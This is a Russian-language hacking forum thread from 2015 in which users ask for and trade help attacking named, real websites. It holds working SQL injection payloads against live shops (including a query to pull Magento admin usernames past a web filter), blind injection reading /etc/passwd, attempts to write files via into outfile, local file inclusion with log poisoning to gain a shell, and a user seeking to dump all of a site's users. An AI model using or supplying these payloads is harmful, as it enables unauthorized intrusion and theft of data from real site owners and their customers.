http://yll.cce.tw/mastersys.php?mode=cent
http://svadesi.com/tagsdb/actor_page.php?lang=jj&tag=lucky ali (http://svadesi.com/tagsdb/actor_page.php?lang=jj&tag=lucky%20ali)
sunnyfruit said:
↑ (https://antichat.live/posts/3839262/)
Парни, подскажите, можно тут раскрутить php LFI:
https://autopaymentfinder.com/dealers/index.php?p=ll
http://yll.cce.tw/mastersys.php?mode=cent
http://svadesi.com/tagsdb/actor_page.php?lang=jj&tag=lucky ali (http://svadesi.com/tagsdb/actor_page.php?lang=jj&tag=lucky%20ali)
Что Вы пробовали?
В первой ссылке все обходится 4096 слэшдотами.
sunnyfruit
20.04.2015, 18:29
YaBtr said:
↑ (https://antichat.live/posts/3839267/)
Что Вы пробовали?
В первой ссылке все обходится 4096 слэшдотами.
Пробовал читать /proc/self/environ но там вроде как инклуд патх везде не дает лазить далее файлов на самом сайте.
Нулл байт пробовал.
Слешдотов должно быть именно 4096? Какой предел?
Тема древняя, почитайте тут http://raz0r.name/articles/null-byte-alternative/
YaBtr said:
↑ (https://antichat.live/posts/3839171/)
xxl
, если хотите, чтобы Вам помогли, то нужно задавать корректный и внятный вопрос, а еще лучше, опубликовать ссылку на язвимый сайт. Читайте правила! Если не отредактируете, пост будет удален.
Сделал. Просто мне казалось,что есть какое-то универсальное решение в случаях,когда мап так ругается.
sunnyfruit
21.04.2015, 15:39
https://autopaymentfinder.com/phpinfo.php
тут есть phpinfo
как залиться можно? через логи?
sunnyfruit said:
↑ (https://antichat.live/posts/3839549/)
https://autopaymentfinder.com/phpinfo.php
тут есть phpinfo
как залиться можно? через логи?
один phpinfo вам ничего не дает.
sunnyfruit
21.04.2015, 15:51
faza02 said:
↑ (https://antichat.live/posts/3839550/)
один phpinfo вам ничего не дает.
Нужно логи с еррорами инклудить?
тут /proc/self/environ недоступен
sunnyfruit said:
↑ (https://antichat.live/posts/3839552/)
Нужно логи с еррорами инклудить?
тут /proc/self/environ недоступен
как минимум нужен инклуд, да. все остальное стандартно, пытайтесь записать ваш код в еррор логи, ацес логи, логи авторизации
http://itix.pp.ua/2013/01/06/безопа...local-file-include-и-rfi-remote-file-include/ (http://itix.pp.ua/2013/01/06/%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D 0%BE%D1%81%D1%82%D1%8C-null-byte-lfi-local-file-include-%D0%B8-rfi-remote-file-include/)
у вас lfi?
Ребяяяяяяят, подскажите, можно тут как-то раскрутить? Ни разу не раскручивала подобного рода
Code:
http://photo{REMOVE}vogue.arta{REMOVE}ndcommerce.com/res{REMOVE}ults.php?type=search&search=fashion+or+beauty'&sortby=dtc&page=2
vikler said:
↑ (https://antichat.live/posts/3839702/)
Ребяяяяяяят, подскажите, можно тут как-то раскрутить? Ни разу не раскручивала подобного рода
Code:
http://photo{REMOVE}vogue.arta{REMOVE}ndcommerce.com/res{REMOVE}ults.php?type=search&search=fashion+or+beauty'&sortby=dtc&page=2
из запроса вырезаются кавычки, но перед этим экранируются - поэтому и появляется ошибка. однако внедирть ничего после кавычки не вышло
sunnyfruit
22.04.2015, 11:48
faza02 said:
↑ (https://antichat.live/posts/3839571/)
как минимум нужен инклуд, да. все остальное стандартно, пытайтесь записать ваш код в еррор логи, ацес логи, логи авторизации
http://itix.pp.ua/2013/01/06/безопасность-null-byte-lfi-local-file-include-и-rfi-remote-file-include/ (http://itix.pp.ua/2013/01/06/%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D 0%BE%D1%81%D1%82%D1%8C-null-byte-lfi-local-file-include-%D0%B8-rfi-remote-file-include/)
у вас lfi?
Да, LFI
акксесс логи обновляются каждый раз при заходе с 1 компа на любую веб страницу сайта + картинки, логи как минимум от 100мб и наврятли подлежат адекватному инклуду
Еррор логи я думаю меньше намного и иклудить стоит именно их.
А где логи авторизации хранятся?
sunnyfruit said:
↑ (https://antichat.live/posts/3839737/)
Да, LFI
акксесс логи обновляются каждый раз при заходе с 1 компа на любую веб страницу сайта + картинки, логи как минимум от 100мб и наврятли подлежат адекватному инклуду
Еррор логи я думаю меньше намного и иклудить стоит именно их.
А где логи авторизации хранятся?
http://www.lanmaster53.com/2011/05/local-file-inclusion-to-remote-command-execution-using-ssh/
посмотрите еще соседей, возможно получится проинклудить что-нибудь у них. в error_log, обычно, пишется refferer
совсем забыл: https://rdot.org/forum/showthread.php?t=1134
sunnyfruit
22.04.2015, 16:39
faza02 said:
↑ (https://antichat.live/posts/3839750/)
http://www.lanmaster53.com/2011/05/local-file-inclusion-to-remote-command-execution-using-ssh/
посмотрите еще соседей, возможно получится проинклудить что-нибудь у них. в error_log, обычно, пишется refferer
совсем забыл:
https://rdot.org/forum/showthread.php?t=1134
Первая статья кул!
Со второй статьей не понял.
Идет речь о замедленной передаче $_FILES в temp директорию?
Что за файл /tmp/lastline?
sunnyfruit said:
↑ (https://antichat.live/posts/3839802/)
Первая статья кул!
Со второй статьей не понял.
Идет речь о замедленной передаче $_FILES в temp директорию?
Что за файл /tmp/lastline?
оттуда вам нужен только сплойт. https://rdot.org/forum/showpost.php?p=18024&postcount=11
указываете путь до phpinfo, /etc/passwd и запускаете
palec2006
23.04.2015, 03:42
помогите люди добрые.
слепая:
PHP:
'or(if(load_file('/etc/passwd') is not NULL,sleep(1),0))or'
PHP:
'or(if(ascii(substring((load_file('/etc/passwd')),461))>=117,sleep(1),0))or'
фильтрации нет, пролазит всё,
обрезать or' не могу
с заливкой борода:
PHP:
'or(select 1 into outfile '/tmp/1.txt')or'
не дает результата
есть варианты залится?
Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+database())),1 )*'
Помогите составить запрос, чтоб вытащить имена таблиц. Непонятно что фильтруется.
Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+table_name+fro m+infromation_schema.tables+limit+0,1)),1)*'
результата не дает.
Br@!ns said:
↑ (https://antichat.live/posts/3839966/)
Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+database())),1 )*'
Помогите составить запрос, чтоб вытащить имена таблиц. Непонятно что фильтруется.
Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+table_name+fro m+infromation_schema.tables+limit+0,1)),1)*'
результата не дает.
Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select(group_concat(t able_name))from(information_schema.tables))),1)*'
palec2006 said:
↑ (https://antichat.live/posts/3839954/)
помогите люди добрые.
слепая:
PHP:
'or(if(load_file('/etc/passwd') is not NULL,sleep(1),0))or'
PHP:
'or(if(ascii(substring((load_file('/etc/passwd')),461))>=117,sleep(1),0))or'
фильтрации нет, пролазит всё,
обрезать
or'
не могу
с заливкой борода:
PHP:
'or(select 1 into outfile '/tmp/1.txt')or'
не дает результата
есть варианты залится?
дайте ссылку глянуть
palec2006
23.04.2015, 11:08
faza02 said:
↑ (https://antichat.live/posts/3839984/)
дайте ссылку глянуть
извините, слишком жирный рес чтоб светить
нужный запрос:
Code:
https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select(mid(group_conc at(username),1,1032))from(magento_admin_user))),1) *'
WAF запрещает последовательные записи в url строке select и admin_user как я понял
Помогите выполнить запрос
Code:
http://www.isoimagesuk.com/pixaria.thumbnail.php?file=L25mcy9jMDkvaDA1L21udC8 xMzI0MzYvZG9tYWlucy9pc29pbWFnZXN1ay5jb20vaHRtbC9yZ XNvdXJjZXMvbGlicmFyeS8yMDE0LTA0LTE4LzgweDgwL0lTT19 FWENBTExST1VORF9FQVNURU5ERVJTU1BPSUxFUl9MVUNZX0dSQ VZFU0lERTg2NS5qcGc=
вроде как LFI. ну по сути file=... в base64 абсолютный путь
Но не знаю как раскрутить короче. не очень стандартно тут. Есть идеи?
Ребят,я вот понять не могу. Nikto говорит,что можно заюзать уязвимость,отправляя спец. запрос,аля:
/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 (php-credits)
/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 (http://s018.radikal.ru/i512/1504/73/b71e3ddc27cb.gif )
/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 (php)
/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 (zend engine 2)
Где об этом можно почитать? И что из этого можно получить?
P/S. так же есть PMA (3.4.11.1) и SquirrelMail (version 1.4.23 [SVN]). Буду благодарен за любую помощь!
(PHP Version 5.4.36-0+deb7u3
This program makes use of the Zend Scripting Language Engine:
Zend Engine v2.4.0, Copyright (c) 1998-2014 Zend Technologies
)
Strilo4ka
26.04.2015, 11:36
xxl said:
↑ (https://antichat.live/posts/3840853/)
Ребят,я вот понять не могу. Nikto говорит,что можно заюзать уязвимость,отправляя спец. запрос,аля:
/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 (php-credits)
/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 (
http://s018.radikal.ru/i512/1504/73/b71e3ddc27cb.gif
)
/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 (php)
/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 (zend engine 2)
Где об этом можно почитать? И что из этого можно получить?
гуглите пасхальные яйца php
Strilo4ka said:
↑ (https://antichat.live/posts/3840855/)
гуглите пасхальные яйца php
"Сразу хочется подчеркнуть, что пасхальные яйца PHP, о которых пойдёт речь, абсолютно безобидны" =(((
xxl said:
↑ (https://antichat.live/posts/3840853/)
PMA (3.4.11.1)
/setup/ = Невозможно загрузить или сохранить настройки (т.к. нет каталога config)
http://s020.radikal.ru/i720/1504/66/32cbd04163f4.jpg
тоже странно...Юзеры же есть на сайте + инфа явно из бд чекается
vikler said:
↑ (https://antichat.live/posts/3840824/)
Code:
http://www.isoimagesuk.com/pixaria.thumbnail.php?file=L25mcy9jMDkvaDA1L21udC8 xMzI0MzYvZG9tYWlucy9pc29pbWFnZXN1ay5jb20vaHRtbC9yZ XNvdXJjZXMvbGlicmFyeS8yMDE0LTA0LTE4LzgweDgwL0lTT19 FWENBTExST1VORF9FQVNURU5ERVJTU1BPSUxFUl9MVUNZX0dSQ VZFU0lERTg2NS5qcGc=
вроде как LFI. ну по сути file=... в base64 абсолютный путь
Но не знаю как раскрутить короче. не очень стандартно тут. Есть идеи?
простите, что дублирую, у кого-нибудь есть идеи? или тут макс. что проверка на возможность чтения файла?
vikler said:
↑ (https://antichat.live/posts/3841076/)
простите, что дублирую, у кого-нибудь есть идеи? или тут макс. что проверка на возможность чтения файла?
никак не лфи. даже файлы нельзя брутфорсить, потому что в случае ошибки всегда отображается дефолтная картинка. плюс, у вас open_basedir:
Code:
http://www.isoimagesuk.com/pixaria.thumbnail.php?file=L2V0Yy9wYXNzd2Q=
xxl said:
↑ (https://antichat.live/posts/3840874/)
/setup/ = Невозможно загрузить или сохранить настройки (т.к. нет каталога config)
http://s020.radikal.ru/i720/1504/66/32cbd04163f4.jpg
тоже странно...Юзеры же есть на сайте + инфа явно из бд чекается
возможно, что pma совсем в другом месте, а это просто неактивная
faza02 said:
↑ (https://antichat.live/posts/3841084/)
возможно, что pma совсем в другом месте, а это просто неактивная
верно,есть еще по адресу /phpmyadmin/Documentation.html (phpMyAdmin 2.6.2-pl1 Documentation),но при переходе на индекс PMA:
phpMyAdmin - Ошибка
phpMyAdmin не может прочитать данные из конфигурационного файла!
Возможная причина - синтаксическая ошибка.
Вызовите этот файл (config.inc.php) непосредственно из браузера. Если будут сообщения об ошибках - исправьте их. Если пустая страница - все в порядке
config.inc.php
Если же перейти по ссылке на файл конфига,то 404-ошбка
sunnyfruit
27.04.2015, 17:00
Кто нибудь сталкивался с LFI, когда параметры передаются вот так:
php://input (в данном случае input берется из http заголовков.)
Нашел статью http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html, но я не понял как http заголовки попадают в поток input.
Есть сайт, на нём time based + boolean. Boolean через скулмап даёт неверный вывод, то есть имена типа jkKJADJKKDAKk
Однако, time based выводит всё нормально
Ок, может там нет boolean, но тогда бы длины названий бд, таблиц, КОЛИЧЕСТВО не совпадали бы в boolean и time based, верно?
Я пыталась давай regex, строку на случаи false и тп. Не помогает. По time based слишком медленно. Нужно слить всех юзеров. Есть идеи?
И да, кто может мне помочь и глянуть на сайт, напишите в личку плиз ) могу заплатить (не очень дорого, если возможно, т.к. нужен совет и ты "носом", как мне самой всё закончить, ибо цель научиться, а не использовать знания другого человека)
Спасибо заранее за любые советы. Сама маюсь уже этим сайтом, тошнит даже
sunnyfruit said:
↑ (https://antichat.live/posts/3841241/)
Кто нибудь сталкивался с LFI, когда параметры передаются вот так:
php://input (в данном случае input берется из http заголовков.)
Нашел статью
http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html
, но я не понял как http заголовки попадают в поток input.
это врапперы. http://php.net/manual/ru/wrappers.php http://www.ptsecurity.ru/ics/А.Москвин_О_безоп_исп_РНР_wrap pers.pdf (http://www.ptsecurity.ru/ics/%D0%90.%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B8%D0%BD_ %D0%9E_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF_%D0%B8%D1%81 %D0%BF_%D0%A0%D0%9D%D0%A0_wrappers.pdf)
не понял, про какие вы заголовки. там берется поток через инпут и отправляется пост запрос
vikler said:
↑ (https://antichat.live/posts/3841261/)
Есть сайт, на нём time based + boolean. Boolean через скулмап даёт неверный вывод, то есть имена типа jkKJADJKKDAKk
Однако, time based выводит всё нормально
Ок, может там нет boolean, но тогда бы длины названий бд, таблиц, КОЛИЧЕСТВО не совпадали бы в boolean и time based, верно?
Я пыталась давай regex, строку на случаи false и тп. Не помогает. По time based слишком медленно. Нужно слить всех юзеров. Есть идеи?
И да, кто может мне помочь и глянуть на сайт, напишите в личку плиз ) могу заплатить (не очень дорого, если возможно, т.к. нужен совет и ты "носом", как мне самой всё закончить, ибо цель научиться, а не использовать знания другого человека)
Спасибо заранее за любые советы. Сама маюсь уже этим сайтом, тошнит даже
скиньте в лс
xxl said:
↑ (https://antichat.live/posts/3841105/)
верно,есть еще по адресу /phpmyadmin/Documentation.html (phpMyAdmin 2.6.2-pl1 Documentation),но при переходе на индекс PMA:
phpMyAdmin - Ошибка
phpMyAdmin не может прочитать данные из конфигурационного файла!
Возможная причина - синтаксическая ошибка.
Вызовите этот файл (config.inc.php) непосредственно из браузера. Если будут сообщения об ошибках - исправьте их. Если пустая страница - все в порядке
config.inc.php
Если же перейти по ссылке на файл конфига,то 404-ошбка
что непонятного? файла конфига нет, значит достутчаться до PMA не выйдет
Продолжении темы есть там -> /threads/424557/ (https://antichat.live/threads/424557/)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot